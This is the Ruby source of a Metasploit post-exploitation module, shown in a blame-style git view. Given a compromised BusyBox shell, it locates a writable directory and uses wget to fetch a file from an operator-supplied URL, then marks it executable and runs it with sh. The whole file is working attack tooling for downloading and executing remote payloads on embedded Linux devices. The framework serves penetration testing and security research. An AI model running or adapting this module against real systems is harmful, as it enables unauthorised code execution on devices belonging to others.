metasploit-framework/modules/post/linux/busybox/wget_exec.rb

55 lines
1.6 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
include Msf::Post::File
2015-08-28 16:50:17 +00:00
include Msf::Post::Linux::BusyBox
def initialize
super(
2015-08-28 16:24:41 +00:00
'Name' => 'BusyBox Download and Execute',
'Description' => %q{
This module will be applied on a session connected to a BusyBox shell. It will use wget to
download and execute a file from the device running BusyBox.
},
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'Platform' => ['linux'],
2015-08-28 16:24:41 +00:00
'SessionTypes' => ['shell']
)
register_options(
[
2015-08-28 16:24:41 +00:00
OptString.new('URL', [true, 'Full URL of file to download'])
], self.class)
end
def run
2015-09-04 16:52:55 +00:00
print_status('Searching a writable directory...')
2015-08-28 18:26:52 +00:00
writable_directory = busy_box_writable_dir
if writable_directory
2015-08-28 16:24:41 +00:00
print_status('Writable directory found, downloading file...')
random_file_path = "#{writable_directory}#{Rex::Text.rand_text_alpha(16)}"
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}")
Rex::sleep(0.1)
2015-08-28 16:56:12 +00:00
if busy_box_file_exist?(random_file_path)
2015-08-28 16:24:41 +00:00
print_good('File downloaded, executing...')
cmd_exec("chmod 777 #{random_file_path}")
Rex::sleep(0.1)
res = cmd_exec("sh #{random_file_path}")
vprint_status(res)
else
2015-08-28 16:24:41 +00:00
print_error('Unable to download file')
end
else
2015-08-28 16:24:41 +00:00
print_error('Writable directory not found')
end
end
end